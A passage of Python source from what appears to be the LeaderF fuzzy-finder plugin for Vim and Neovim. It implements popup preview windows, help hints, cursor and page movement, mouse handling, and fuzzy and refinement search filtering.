line = maxheight + 1
else: # cursor
lfCmd("""call win_execute(%d, "let numberwidth = &numberwidth")""" % popup_window.id)
col = int(popup_pos["core_col"]) + int(lfEval("numberwidth")) + popup_window.cursor[1]
lfCmd("""call win_execute(%d, "let delta_height = line('.') - line('w0')")""" % popup_window.id)
# the line of buffer starts from 0, while the line of line() starts from 1
start = int(lfEval("line('w0', %d)" % popup_window.id)) - 1
end = int(lfEval("line('.', %d)" % popup_window.id)) - 1
col_width = int(popup_pos["core_width"]) - int(lfEval("numberwidth"))
delta_height = lfActualLineCount(self._getInstance().buffer, start, end, col_width)
# int(popup_pos["core_line"]) - 1(exclude the first line) - 1(input window)
maxheight = int(popup_pos["core_line"]) + delta_height - 2
pos = "botleft"
line = maxheight + 1
options = {
"title": title,
"maxwidth": maxwidth,
"minwidth": maxwidth,
"maxheight": maxheight,
"minheight": maxheight,
"zindex": 20481,
"pos": pos,
"line": line,
"col": col,
"padding": [0, 0, 0, 1],
"border": [1, 0, 0, 0],
"borderchars": [' '],
"borderhighlight": ["Lf_hl_previewTitle"],
"filter": "leaderf#popupModePreviewFilter",
}
if preview_pos.lower() == 'bottom':
del options["title"]
options["border"] = [0, 0, 1, 0]
elif preview_pos.lower() == 'cursor' and maxheight < int(lfEval("&lines"))//2 - 2:
maxheight = int(lfEval("&lines")) - maxheight - 5
del options["title"]
options["border"] = [0, 0, 1, 0]
options["maxheight"] = maxheight
options["minheight"] = maxheight
lfCmd("silent! let winid = popup_create(%d, %s)" % (buf_number, str(options)))
self._preview_winid = int(lfEval("winid"))
if jump_cmd:
lfCmd("""call win_execute(%d, '%s')""" % (self._preview_winid, escQuote(jump_cmd)))
elif line_nr > 0:
lfCmd("""call win_execute(%d, "exec 'norm! %dG'")""" % (self._preview_winid, line_nr))
lfCmd("call win_execute(%d, 'setlocal cursorline number norelativenumber colorcolumn= ')" % self._preview_winid)
lfCmd("call win_execute(%d, 'setlocal wincolor=Lf_hl_popup_window')" % self._preview_winid)
def _createPopupPreview(self, title, buf_number, line_nr, jump_cmd=''):
buf_number = int(buf_number)
line_nr = int(line_nr)
if self._getInstance().getWinPos() in ('popup', 'floatwin'):
self._createPopupModePreview(title, buf_number, line_nr, jump_cmd)
return
if lfEval("has('nvim')") == '1':
width = int(lfEval("get(g:, 'Lf_PreviewPopupWidth', 0)"))
if width == 0:
width = int(lfEval("&columns"))//2
else:
width = min(width, int(lfEval("&columns")))
maxheight = int(lfEval("&lines - (line('w$') - line('.')) - 3"))
maxheight -= int(self._getInstance().window.height) - int(lfEval("(line('w$') - line('w0') + 1)"))
relative = 'editor'
anchor = "SW"
row = maxheight
lfCmd("silent! call bufload(%d)" % buf_number)
buffer_len = len(vim.buffers[buf_number])
height = min(maxheight, buffer_len)
preview_pos = lfEval("get(g:, 'Lf_PreviewHorizontalPosition', 'cursor')")
if preview_pos.lower() == 'center':
col = (int(lfEval("&columns")) - width) // 2
elif preview_pos.lower() == 'left':
col = 0
elif preview_pos.lower() == 'right':
col = int(lfEval("&columns")) - width
else:
relative = 'cursor'
row = 0
col = 0
if maxheight < int(lfEval("&lines"))//2 - 2:
anchor = "NW"
if relative == 'cursor':
row = 1
else:
row = maxheight + 1
height = min(int(lfEval("&lines")) - maxheight - 3, buffer_len)
config = {
"relative": relative,
"anchor" : anchor,
"height" : height,
"width" : width,
"row" : row,
"col" : col
}
self._preview_winid = int(lfEval("nvim_open_win(%d, 0, %s)" % (buf_number, str(config))))
if jump_cmd:
cur_winid = lfEval("win_getid()")
lfCmd("noautocmd call win_gotoid(%d)" % self._preview_winid)
lfCmd(jump_cmd)
lfCmd("noautocmd call win_gotoid(%s)" % cur_winid)
if buffer_len >= line_nr > 0:
lfCmd("""call nvim_win_set_cursor(%d, [%d, 1])""" % (self._preview_winid, line_nr))
lfCmd("call nvim_win_set_option(%d, 'number', v:true)" % self._preview_winid)
lfCmd("call nvim_win_set_option(%d, 'relativenumber', v:false)" % self._preview_winid)
lfCmd("call nvim_win_set_option(%d, 'foldlevel', 1000)" % self._preview_winid)
lfCmd("call nvim_win_set_option(%d, 'cursorline', v:true)" % self._preview_winid)
lfCmd("call nvim_win_set_option(%d, 'colorcolumn', '')" % self._preview_winid)
else:
preview_pos = lfEval("get(g:, 'Lf_PreviewHorizontalPosition', 'cursor')")
if preview_pos.lower() == 'center':
col = 0
elif preview_pos.lower() == 'left':
col = 1
elif preview_pos.lower() == 'right':
col = int(lfEval("&columns"))//2 + 2
else:
col = "cursor"
width = int(lfEval("get(g:, 'Lf_PreviewPopupWidth', 0)"))
if width == 0:
maxwidth = int(lfEval("&columns"))//2 - 1
else:
maxwidth = min(width, int(lfEval("&columns")))
maxheight = int(lfEval("&lines - (line('w$') - line('.')) - 4"))
maxheight -= int(self._getInstance().window.height) - int(lfEval("(line('w$') - line('w0') + 1)"))
if self._current_mode == 'NORMAL':
filter_cb = "leaderf#normalModePreviewFilter"
else:
filter_cb = "leaderf#popupModePreviewFilter"
options = {
"title": title,
"maxwidth": maxwidth,
"minwidth": maxwidth,
"maxheight": maxheight,
"minheight": maxheight,
"zindex": 20481,
"pos": "botleft",
"line": "cursor-1",
"col": col,
"padding": [0, 0, 0, 1],
"border": [1, 0, 0, 0],
"borderchars": [' '],
"borderhighlight": ["Lf_hl_previewTitle"],
"filter": filter_cb,
}
if maxheight < int(lfEval("&lines"))//2 - 2:
maxheight = int(lfEval("&lines")) - maxheight - 5
del options["title"]
options["border"] = [0, 0, 1, 0]
options["maxheight"] = maxheight
options["minheight"] = maxheight
lfCmd("silent! let winid = popup_create(%d, %s)" % (buf_number, str(options)))
self._preview_winid = int(lfEval("winid"))
if jump_cmd:
lfCmd("""call win_execute(%d, '%s')""" % (self._preview_winid, escQuote(jump_cmd)))
elif line_nr > 0:
lfCmd("""call win_execute(%d, "exec 'norm! %dG'")""" % (self._preview_winid, line_nr))
lfCmd("call win_execute(%d, 'setlocal cursorline number norelativenumber')" % self._preview_winid)
def _needPreview(self, preview):
"""
Args:
preview:
if True, always preview the result no matter what `g:Lf_PreviewResult` is.
"""
preview_dict = {k.lower(): v for k, v in lfEval("g:Lf_PreviewResult").items()}
category = self._getExplorer().getStlCategory()
if not preview and int(preview_dict.get(category.lower(), 0)) == 0:
return False
if self._getInstance().isReverseOrder():
if self._getInstance().window.cursor[0] > len(self._getInstance().buffer) - self._help_length:
return False
elif self._getInstance().window.cursor[0] <= self._help_length:
return False
if self._getInstance().empty() or (self._getInstance().getWinPos() != 'popup' and
vim.current.buffer != self._getInstance().buffer):
return False
if self._ctrlp_pressed == True:
return True
line = self._getInstance().currentLine
if self._orig_line == line and self._getInstance().buffer.options['modifiable']:
return False
self._orig_line = line
return True
def _getInstance(self):
if self._instance is None:
self._instance = LfInstance(self, self._getExplorer().getStlCategory(),
self._cli,
self._beforeEnter,
self._afterEnter,
self._beforeExit,
self._afterExit)
return self._instance
def _createHelpHint(self):
help = []
if not self._show_help:
if lfEval("get(g:, 'Lf_HideHelp', 0)") == '0':
help.append('" Press <F1> for help')
help.append('" ---------------------------------------------------------')
else:
help += self._createHelp()
self._help_length = len(help)
orig_row = self._getInstance().window.cursor[0]
if self._getInstance().isReverseOrder():
self._getInstance().buffer.options['modifiable'] = True
self._getInstance().buffer.append(help[::-1])
self._getInstance().buffer.options['modifiable'] = False
buffer_len = len(self._getInstance().buffer)
if buffer_len < self._initial_count:
if "--nowrap" not in self._arguments:
self._getInstance().window.height = min(self._initial_count,
self._getInstance()._actualLength(self._getInstance().buffer))
else:
self._getInstance().window.height = buffer_len
elif self._getInstance().window.height < self._initial_count:
self._getInstance().window.height = self._initial_count
lfCmd("normal! Gzb")
self._getInstance().window.cursor = (orig_row, 0)
else:
self._getInstance().buffer.options['modifiable'] = True
self._getInstance().buffer.append(help, 0)
self._getInstance().buffer.options['modifiable'] = False
self._getInstance().window.cursor = (orig_row + self._help_length, 0)
self._getInstance().refreshPopupStatusline()
def _hideHelp(self):
self._getInstance().buffer.options['modifiable'] = True
if self._getInstance().isReverseOrder():
orig_row = self._getInstance().window.cursor[0]
countdown = len(self._getInstance().buffer) - orig_row - self._help_length
if self._help_length > 0:
del self._getInstance().buffer[-self._help_length:]
self._getInstance().buffer[:] = self._getInstance().buffer[-self._initial_count:]
lfCmd("normal! Gzb")
if 0 < countdown < self._initial_count:
self._getInstance().window.cursor = (len(self._getInstance().buffer) - countdown, 0)
else:
self._getInstance().window.cursor = (len(self._getInstance().buffer), 0)
self._getInstance().setLineNumber()
else:
del self._getInstance().buffer[:self._help_length]
if self._help_length > 0 and self._getInstance().getWinPos() == 'popup':
lfCmd("call win_execute(%d, 'norm! %dk')" % (self._getInstance().getPopupWinId(), self._help_length))
self._help_length = 0
self._getInstance().refreshPopupStatusline()
def _getExplorer(self):
if self._explorer is None:
self._explorer = self._getExplClass()()
return self._explorer
def _resetAutochdir(self):
if int(lfEval("&autochdir")) == 1:
self._autochdir = 1
lfCmd("set noautochdir")
else:
self._autochdir = 0
def _setAutochdir(self):
if self._autochdir == 1:
# When autochdir is set, Vim will change the current working directory
# to the directory containing the file which was opened or selected.
lfCmd("set autochdir")
def _toUpInPopup(self):
if self._preview_winid > 0 and int(lfEval("winbufnr(%d)" % self._preview_winid)) != -1:
if lfEval("has('nvim')") == '1':
cur_winid = lfEval("win_getid()")
lfCmd("noautocmd call win_gotoid(%d)" % self._preview_winid)
lfCmd("norm! k")
lfCmd("redraw")
lfCmd("noautocmd call win_gotoid(%s)" % cur_winid)
else:
lfCmd("call win_execute(%d, 'norm! k')" % (self._preview_winid))
def _toDownInPopup(self):
if self._preview_winid > 0 and int(lfEval("winbufnr(%d)" % self._preview_winid)) != -1:
if lfEval("has('nvim')") == '1':
cur_winid = lfEval("win_getid()")
lfCmd("noautocmd call win_gotoid(%d)" % self._preview_winid)
lfCmd("norm! j")
lfCmd("redraw")
lfCmd("noautocmd call win_gotoid(%s)" % cur_winid)
else:
lfCmd("call win_execute(%d, 'norm! j')" % (self._preview_winid))
def _toUp(self):
if self._getInstance().getWinPos() == 'popup':
lfCmd("call win_execute(%d, 'norm! k')" % (self._getInstance().getPopupWinId()))
self._getInstance().refreshPopupStatusline()
return
adjust = False
if self._getInstance().isReverseOrder() and self._getInstance().getCurrentPos()[0] == 1:
adjust = True
self._setResultContent()
if self._cli.pattern and self._cli.isFuzzy \
and len(self._highlight_pos) < (len(self._getInstance().buffer) - self._help_length) // self._getUnit() \
and len(self._highlight_pos) < int(lfEval("g:Lf_NumberOfHighlight")):
self._highlight_method()
lfCmd("norm! k")
if adjust:
lfCmd("norm! zt")
self._getInstance().setLineNumber()
lfCmd("setlocal cursorline!") # these two help to redraw the statusline,
lfCmd("setlocal cursorline!") # also fix a weird bug of vim
def _toDown(self):
if self._getInstance().getWinPos() == 'popup':
lfCmd("call win_execute(%d, 'norm! j')" % (self._getInstance().getPopupWinId()))
self._getInstance().refreshPopupStatusline()
return
if not self._getInstance().isReverseOrder() \
and self._getInstance().getCurrentPos()[0] == self._getInstance().window.height:
self._setResultContent()
lfCmd("norm! j")
self._getInstance().setLineNumber()
lfCmd("setlocal cursorline!") # these two help to redraw the statusline,
lfCmd("setlocal cursorline!") # also fix a weird bug of vim
def _pageUp(self):
if self._getInstance().getWinPos() == 'popup':
lfCmd("""call win_execute(%d, 'exec "norm! \<PageUp>"')""" % (self._getInstance().getPopupWinId()))
self._getInstance().refreshPopupStatusline()
return
if self._getInstance().isReverseOrder():
self._setResultContent()
if self._cli.pattern and self._cli.isFuzzy \
and len(self._highlight_pos) < (len(self._getInstance().buffer) - self._help_length) // self._getUnit() \
and len(self._highlight_pos) < int(lfEval("g:Lf_NumberOfHighlight")):
self._highlight_method()
lfCmd('exec "norm! \<PageUp>"')
self._getInstance().setLineNumber()
def _pageDown(self):
if self._getInstance().getWinPos() == 'popup':
lfCmd("""call win_execute(%d, 'exec "norm! \<PageDown>"')""" % (self._getInstance().getPopupWinId()))
self._getInstance().refreshPopupStatusline()
return
if not self._getInstance().isReverseOrder():
self._setResultContent()
lfCmd('exec "norm! \<PageDown>"')
self._getInstance().setLineNumber()
def _leftClick(self):
if self._getInstance().getWinPos() == 'popup':
if int(lfEval("has('patch-8.1.2266')")) == 1:
if self._getInstance().getPopupWinId() == int(lfEval("v:mouse_winid")):
lfCmd("""call win_execute(%d, "exec v:mouse_lnum")""" % (self._getInstance().getPopupWinId()))
lfCmd("""call win_execute(%d, "exec 'norm!'.v:mouse_col.'|'")""" % (self._getInstance().getPopupWinId()))
exit_loop = False
elif self._getInstance().window.number == int(lfEval("v:mouse_win")):
lfCmd("exec v:mouse_lnum")
lfCmd("exec 'norm!'.v:mouse_col.'|'")
self._getInstance().setLineNumber()
self.clearSelections()
exit_loop = False
elif self._preview_winid == int(lfEval("v:mouse_winid")):
if lfEval("has('nvim')") == '1':
lfCmd("call win_gotoid(%d)" % self._preview_winid)
lfCmd("exec v:mouse_lnum")
lfCmd("exec 'norm!'.v:mouse_col.'|'")
self._current_mode = 'NORMAL'
lfCmd("call leaderf#colorscheme#popup#hiMode('%s', '%s')" % (self._getExplorer().getStlCategory(), self._current_mode))
self._getInstance().setPopupStl(self._current_mode)
exit_loop = True
else:
self.quit()
exit_loop = True
return exit_loop
def _search(self, content, is_continue=False, step=0):
if not is_continue:
self.clearSelections()
self._clearHighlights()
self._clearHighlightsPos()
self._cli.highlightMatches()
if not self._cli.pattern: # e.g., when <BS> or <Del> is typed
if self._empty_query and self._getExplorer().getStlCategory() in ["File"]:
self._guessSearch(self._content)
else:
self._getInstance().setBuffer(content[:self._initial_count])
self._getInstance().setStlResultsCount(len(content), True)
self._result_content = []
return
if self._cli.isFuzzy:
self._fuzzySearch(content, is_continue, step)
else:
self._regexSearch(content, is_continue, step)
if self._getExplorer().getStlCategory() not in ["File"]:
self._previewResult(False)
def _filter(self, step, filter_method, content, is_continue,
use_fuzzy_engine=False, return_index=False):
""" Construct a list from result of filter_method(content).
Args:
step: An integer indicating the number of lines to filter at a time.
filter_method: A function that takes `content` as its parameter and
returns an iterable.
content: The list to be filtered.
"""
unit = self._getUnit()
step = step // unit * unit
length = len(content)
if self._index == 0:
self._cb_content = []
self._result_content = []
self._index = min(step, length)
cur_content = content[:self._index]
else:
if not is_continue and self._result_content:
if self._cb_content:
self._cb_content += self._result_content
else:
self._cb_content = self._result_content
if len(self._cb_content) >= step:
cur_content = self._cb_content[:step]
self._cb_content = self._cb_content[step:]
else:
cur_content = self._cb_content
left = step - len(self._cb_content)
self._cb_content = []
if self._index < length:
end = min(self._index + left, length)
cur_content += content[self._index:end]
self._index = end
if self._cli.isAndMode:
result, highlight_methods = filter_method(cur_content)
if is_continue:
self._previous_result = (self._previous_result[0] + result[0],
self._previous_result[1] + result[1])
result = self._previous_result
else:
self._previous_result = result
return (result, highlight_methods)
elif use_fuzzy_engine:
if return_index:
mode = 0 if self._cli.isFullPath else 1
tmp_content = [self._getDigest(line, mode) for line in cur_content]
result = filter_method(source=tmp_content)
result = (result[0], [cur_content[i] for i in result[1]])
else:
result = filter_method(source=cur_content)
if is_continue:
result = fuzzyEngine.merge(self._previous_result, result)
self._previous_result = result
else:
result = list(filter_method(cur_content))
if is_continue:
self._previous_result += result
result = self._previous_result
else:
self._previous_result = result
return result
def _fuzzyFilter(self, is_full_path, get_weight, iterable):
"""
return a list, each item is a pair (weight, line)
"""
getDigest = partial(self._getDigest, mode=0 if is_full_path else 1)
pairs = ((get_weight(getDigest(line)), line) for line in iterable)
MIN_WEIGHT = fuzzyMatchC.MIN_WEIGHT if is_fuzzyMatch_C else FuzzyMatch.MIN_WEIGHT
return (p for p in pairs if p[0] > MIN_WEIGHT)
def _fuzzyFilterEx(self, is_full_path, get_weight, iterable):
"""
return a tuple, (weights, indices)
"""
getDigest = partial(self._getDigest, mode=0 if is_full_path else 1)
if self._getUnit() > 1: # currently, only BufTag's _getUnit() is 2
iterable = itertools.islice(iterable, 0, None, self._getUnit())
pairs = ((get_weight(getDigest(line)), i) for i, line in enumerate(iterable))
MIN_WEIGHT = fuzzyMatchC.MIN_WEIGHT if is_fuzzyMatch_C else FuzzyMatch.MIN_WEIGHT
result = [p for p in pairs if p[0] > MIN_WEIGHT]
if len(result) == 0:
weights, indices = [], []
else:
weights, indices = zip(*result)
return (list(weights), list(indices))
def _refineFilter(self, first_get_weight, get_weight, iterable):
getDigest = self._getDigest
triples = ((first_get_weight(getDigest(line, 1)),
get_weight(getDigest(line, 2)), line)
for line in iterable)
MIN_WEIGHT = fuzzyMatchC.MIN_WEIGHT if is_fuzzyMatch_C else FuzzyMatch.MIN_WEIGHT
return ((i[0] + i[1], i[2]) for i in triples if i[0] > MIN_WEIGHT and i[1] > MIN_WEIGHT)
def _andModeFilter(self, iterable):
encoding = lfEval("&encoding")
use_fuzzy_engine = False
cur_content = iterable
weight_lists = []
highlight_methods = []
for p in self._cli.pattern:
if self._fuzzy_engine and isAscii(p) and self._getUnit() == 1: # currently, only BufTag's _getUnit() is 2
use_fuzzy_engine = True
pattern = fuzzyEngine.initPattern(p)
if self._getExplorer().getStlCategory() == "File" and self._cli.isFullPath:
filter_method = partial(fuzzyEngine.fuzzyMatchEx, engine=self._fuzzy_engine, pattern=pattern,
is_name_only=False, sort_results=False)
elif self._getExplorer().getStlCategory() in ["Self", "Buffer", "Mru", "BufTag",
"Function", "History", "Cmd_History", "Search_History", "Tag", "Rg", "Filetype",
"Command"]:
filter_method = partial(fuzzyEngine.fuzzyMatchEx, engine=self._fuzzy_engine, pattern=pattern,
is_name_only=True, sort_results=False)
else:
filter_method = partial(fuzzyEngine.fuzzyMatchEx, engine=self._fuzzy_engine, pattern=pattern,
is_name_only=not self._cli.isFullPath, sort_results=False)
getHighlights = partial(fuzzyEngine.getHighlights, engine=self._fuzzy_engine,
pattern=pattern, is_name_only=not self._cli.isFullPath)
highlight_method = partial(self._highlight, self._cli.isFullPath, getHighlights, True, clear=False)
elif is_fuzzyMatch_C and isAscii(p):
pattern = fuzzyMatchC.initPattern(p)
if self._getExplorer().getStlCategory() == "File" and self._cli.isFullPath:
getWeight = partial(fuzzyMatchC.getWeight, pattern=pattern, is_name_only=False)
getHighlights = partial(fuzzyMatchC.getHighlights, pattern=pattern, is_name_only=False)
else:
getWeight = partial(fuzzyMatchC.getWeight, pattern=pattern, is_name_only=True)
getHighlights = partial(fuzzyMatchC.getHighlights, pattern=pattern, is_name_only=True)
filter_method = partial(self._fuzzyFilterEx, self._cli.isFullPath, getWeight)
highlight_method = partial(self._highlight, self._cli.isFullPath, getHighlights, clear=False)
else:
fuzzy_match = FuzzyMatch(p, encoding)
if self._getExplorer().getStlCategory() == "File" and self._cli.isFullPath:
filter_method = partial(self._fuzzyFilterEx,
self._cli.isFullPath,
fuzzy_match.getWeight2)
elif self._getExplorer().getStlCategory() in ["Self", "Buffer", "Mru", "BufTag",
"Function", "History", "Cmd_History", "Search_History", "Tag", "Rg", "Filetype",
"Command"]:
filter_method = partial(self._fuzzyFilterEx,
self._cli.isFullPath,
fuzzy_match.getWeight3)
else:
filter_method = partial(self._fuzzyFilterEx,
self._cli.isFullPath,
fuzzy_match.getWeight)
highlight_method = partial(self._highlight,
self._cli.isFullPath,
fuzzy_match.getHighlights,
clear=False)
if use_fuzzy_engine:
mode = 0 if self._cli.isFullPath else 1
tmp_content = [self._getDigest(line, mode) for line in cur_content]
result = filter_method(source=tmp_content)
else:
result = filter_method(cur_content)
for i, wl in enumerate(weight_lists):
weight_lists[i] = [wl[j] for j in result[1]]
weight_lists.append(result[0])
if self._getUnit() > 1: # currently, only BufTag's _getUnit() is 2
unit = self._getUnit()
result_content = [cur_content[i*unit:i*unit + unit] for i in result[1]]
cur_content = list(itertools.chain.from_iterable(result_content))
else:
cur_content = [cur_content[i] for i in result[1]]
result_content = cur_content
highlight_methods.append(highlight_method)
weights = [sum(i) for i in zip(*weight_lists)]
return ((weights, result_content), highlight_methods)
def _fuzzySearch(self, content, is_continue, step):
encoding = lfEval("&encoding")
use_fuzzy_engine = False
use_fuzzy_match_c = False
if self._cli.isAndMode:
filter_method = self._andModeFilter
elif self._cli.isRefinement:
if self._cli.pattern[1] == '': # e.g. abc;
if self._fuzzy_engine and isAscii(self._cli.pattern[0]):
use_fuzzy_engine = True
return_index = True
pattern = fuzzyEngine.initPattern(self._cli.pattern[0])
filter_method = partial(fuzzyEngine.fuzzyMatchEx, engine=self._fuzzy_engine,
pattern=pattern, is_name_only=True, sort_results=True)
getHighlights = partial(fuzzyEngine.getHighlights, engine=self._fuzzy_engine,
pattern=pattern, is_name_only=True)
highlight_method = partial(self._highlight, True, getHighlights, True)
elif is_fuzzyMatch_C and isAscii(self._cli.pattern[0]):
use_fuzzy_match_c = True
pattern = fuzzyMatchC.initPattern(self._cli.pattern[0])
getWeight = partial(fuzzyMatchC.getWeight, pattern=pattern, is_name_only=True)
getHighlights = partial(fuzzyMatchC.getHighlights, pattern=pattern, is_name_only=True)
filter_method = partial(self._fuzzyFilter, False, getWeight)
highlight_method = partial(self._highlight, False, getHighlights)
else:
fuzzy_match = FuzzyMatch(self._cli.pattern[0], encoding)
getWeight = fuzzy_match.getWeight
getHighlights = fuzzy_match.getHighlights
filter_method = partial(self._fuzzyFilter, False, getWeight)
highlight_method = partial(self._highlight, False, getHighlights)
elif self._cli.pattern[0] == '': # e.g. ;abc
if self._fuzzy_engine and isAscii(self._cli.pattern[1]):
use_fuzzy_engine = True
return_index = True
pattern = fuzzyEngine.initPattern(self._cli.pattern[1])
filter_method = partial(fuzzyEngine.fuzzyMatchEx, engine=self._fuzzy_engine,
pattern=pattern, is_name_only=False, sort_results=True)
getHighlights = partial(fuzzyEngine.getHighlights, engine=self._fuzzy_engine,
pattern=pattern, is_name_only=False)
highlight_method = partial(self._highlight, True, getHighlights, True)
elif is_fuzzyMatch_C and isAscii(self._cli.pattern[1]):
use_fuzzy_match_c = True
pattern = fuzzyMatchC.initPattern(self._cli.pattern[1])
getWeight = partial(fuzzyMatchC.getWeight, pattern=pattern, is_name_only=False)
getHighlights = partial(fuzzyMatchC.getHighlights, pattern=pattern, is_name_only=False)
filter_method = partial(self._fuzzyFilter, True, getWeight)
highlight_method = partial(self._highlight, True, getHighlights)
else:
fuzzy_match = FuzzyMatch(self._cli.pattern[1], encoding)
getWeight = fuzzy_match.getWeight
getHighlights = fuzzy_match.getHighlights
filter_method = partial(self._fuzzyFilter, True, getWeight)
highlight_method = partial(self._highlight, True, getHighlights)
else: # e.g. abc;def
if is_fuzzyMatch_C and isAscii(self._cli.pattern[0]):
is_ascii_0 = True
pattern_0 = fuzzyMatchC.initPattern(self._cli.pattern[0])
getWeight_0 = partial(fuzzyMatchC.getWeight, pattern=pattern_0, is_name_only=True)
getHighlights_0 = partial(fuzzyMatchC.getHighlights, pattern=pattern_0, is_name_only=True)
else:
is_ascii_0 = False
fuzzy_match_0 = FuzzyMatch(self._cli.pattern[0], encoding)
getWeight_0 = fuzzy_match_0.getWeight
getHighlights_0 = fuzzy_match_0.getHighlights
if is_fuzzyMatch_C and isAscii(self._cli.pattern[1]):
is_ascii_1 = True
pattern_1 = fuzzyMatchC.initPattern(self._cli.pattern[1])
getWeight_1 = partial(fuzzyMatchC.getWeight, pattern=pattern_1, is_name_only=False)
getHighlights_1 = partial(fuzzyMatchC.getHighlights, pattern=pattern_1, is_name_only=False)
else:
is_ascii_1 = False
fuzzy_match_1 = FuzzyMatch(self._cli.pattern[1], encoding)
getWeight_1 = fuzzy_match_1.getWeight
getHighlights_1 = fuzzy_match_1.getHighlights
use_fuzzy_match_c = is_ascii_0 and is_ascii_1
filter_method = partial(self._refineFilter, getWeight_0, getWeight_1)
highlight_method = partial(self._highlightRefine, getHighlights_0, getHighlights_1)
else:
if self._fuzzy_engine and isAscii(self._cli.pattern) and self._getUnit() == 1: # currently, only BufTag's _getUnit() is 2
use_fuzzy_engine = True
pattern = fuzzyEngine.initPattern(self._cli.pattern)
if self._getExplorer().getStlCategory() == "File" and self._cli.isFullPath:
return_index = False
filter_method = partial(fuzzyEngine.fuzzyMatch, engine=self._fuzzy_engine, pattern=pattern,
is_name_only=False, sort_results=True)
elif self._getExplorer().getStlCategory() in ["Rg"]:
if "--match-path" in self._arguments:
return_index = False
filter_method = partial(fuzzyEngine.fuzzyMatch, engine=self._fuzzy_engine, pattern=pattern,
is_name_only=True, sort_results=True)
else:
return_index = True
filter_method = partial(fuzzyEngine.fuzzyMatchEx, engine=self._fuzzy_engine, pattern=pattern,
is_name_only=True, sort_results=True)
elif self._getExplorer().getStlCategory() in ["Self", "Buffer", "Mru", "BufTag",
"Function", "History", "Cmd_History", "Search_History", "Tag", "Filetype",
"Command"]:
return_index = True
filter_method = partial(fuzzyEngine.fuzzyMatchEx, engine=self._fuzzy_engine, pattern=pattern,
is_name_only=True, sort_results=True)
else:
return_index = True
filter_method = partial(fuzzyEngine.fuzzyMatchEx, engine=self._fuzzy_engine, pattern=pattern,
is_name_only=not self._cli.isFullPath, sort_results=True)
getHighlights = partial(fuzzyEngine.getHighlights, engine=self._fuzzy_engine,
pattern=pattern, is_name_only=not self._cli.isFullPath)
highlight_method = partial(self._highlight, self._cli.isFullPath, getHighlights, True)
elif is_fuzzyMatch_C and isAscii(self._cli.pattern):
use_fuzzy_match_c = True
pattern = fuzzyMatchC.initPattern(self._cli.pattern)
if self._getExplorer().getStlCategory() == "File" and self._cli.isFullPath:
getWeight = partial(fuzzyMatchC.getWeight, pattern=pattern, is_name_only=False)
getHighlights = partial(fuzzyMatchC.getHighlights, pattern=pattern, is_name_only=False)
else:
getWeight = partial(fuzzyMatchC.getWeight, pattern=pattern, is_name_only=True)
getHighlights = partial(fuzzyMatchC.getHighlights, pattern=pattern, is_name_only=True)
filter_method = partial(self._fuzzyFilter, self._cli.isFullPath, getWeight)
highlight_method = partial(self._highlight, self._cli.isFullPath, getHighlights)
else:
fuzzy_match = FuzzyMatch(self._cli.pattern, encoding)
if self._getExplorer().getStlCategory() == "File" and self._cli.isFullPath:
filter_method = partial(self._fuzzyFilter,
self._cli.isFullPath,
fuzzy_match.getWeight2)
elif self._getExplorer().getStlCategory() in ["Self", "Buffer", "Mru", "BufTag",
"Function", "History", "Cmd_History", "Search_History", "Rg", "Filetype",
"Command"]:
filter_method = partial(self._fuzzyFilter,
self._cli.isFullPath,
fuzzy_match.getWeight3)
else:
filter_method = partial(self._fuzzyFilter,
self._cli.isFullPath,
fuzzy_match.getWeight)
highlight_method = partial(self._highlight,
self._cli.isFullPath,
fuzzy_match.getHighlights)
if self._cli.isAndMode:
if self._fuzzy_engine and isAscii(''.join(self._cli.pattern)):
step = 20000 * cpu_count
else:
step = 10000
pair, highlight_methods = self._filter(step, filter_method, content, is_continue)
pairs = sorted(zip(*pair), key=operator.itemgetter(0), reverse=True)
self._result_content = self._getList(pairs)
elif use_fuzzy_engine:
if step == 0:
if return_index == True:
step = 20000 * cpu_count
else:
step = 40000 * cpu_count
_, self._result_content = self._filter(step, filter_method, content, is_continue, True, return_index)
else:
if step == 0:
if use_fuzzy_match_c:
step = 40000
elif self._getExplorer().supportsNameOnly() and self._cli.isFullPath:
step = 6000
else:
step = 12000
pairs = self._filter(step, filter_method, content, is_continue)
pairs.sort(key=operator.itemgetter(0), reverse=True)
self._result_content = self._getList(pairs)
self._getInstance().setBuffer(self._result_content[:self._initial_count])
self._getInstance().setStlResultsCount(len(self._result_content), True)
if self._cli.isAndMode:
self._highlight_method = partial(self._highlight_and_mode, highlight_methods)
self._highlight_method()
else:
self._highlight_method = highlight_method
self._highlight_method()
def _guessFilter(self, filename, suffix, dirname, iterable):
"""
return a list, each item is a pair (weight, line)
"""
return ((FuzzyMatch.getPathWeight(filename, suffix, dirname, line), line) for line in iterable)
def _guessSearch(self, content, is_continue=False, step=0):
if self._cur_buffer.name == '' or self._cur_buffer.options["buftype"] not in [b'', '']:
self._getInstance().setBuffer(content[:self._initial_count])
self._getInstance().setStlResultsCount(len(content), True)
self._result_content = []
return
buffer_name = os.path.normpath(lfDecode(self._cur_buffer.name))
if lfEval("g:Lf_ShowRelativePath") == '1':
try:
buffer_name = os.path.relpath(buffer_name)
except ValueError:
pass
buffer_name = lfEncode(buffer_name)
dirname, basename = os.path.split(buffer_name)
filename, suffix = os.path.splitext(basename)
if self._fuzzy_engine:
filter_method = partial(fuzzyEngine.guessMatch, engine=self._fuzzy_engine, filename=filename,
suffix=suffix, dirname=dirname, sort_results=True)
step = len(content)
_, self._result_content = self._filter(step, filter_method, content, is_continue, True)
else:
step = len(content)
filter_method = partial(self._guessFilter, filename, suffix, dirname)
pairs = self._filter(step, filter_method, content, is_continue)
pairs.sort(key=operator.itemgetter(0), reverse=True)
self._result_content = self._getList(pairs)
self._getInstance().setBuffer(self._result_content[:self._initial_count])
self._getInstance().setStlResultsCount(len(self._result_content), True)
def _highlight_and_mode(self, highlight_methods):
self._clearHighlights()
for i, highlight_method in enumerate(highlight_methods):
highlight_method(hl_group='Lf_hl_match' + str(i % 5))
def _clearHighlights(self):
if self._getInstance().getWinPos() == 'popup':
for i in self._highlight_ids:
lfCmd("silent! call matchdelete(%d, %d)" % (i, self._getInstance().getPopupWinId()))
else:
for i in self._highlight_ids:
lfCmd("silent! call matchdelete(%d)" % i)
self._highlight_ids = []
def _clearHighlightsPos(self):
self._highlight_pos = []
self._highlight_pos_list = []
self._highlight_refine_pos = []
def _resetHighlights(self):
self._clearHighlights()
unit = self._getUnit()
bottom = len(self._getInstance().buffer) - self._help_length
if self._cli.isAndMode:
highlight_pos_list = self._highlight_pos_list
else:
highlight_pos_list = [self._highlight_pos]
for n, highlight_pos in enumerate(highlight_pos_list):
hl_group = 'Lf_hl_match' + str(n % 5)
for i, pos in enumerate(highlight_pos):
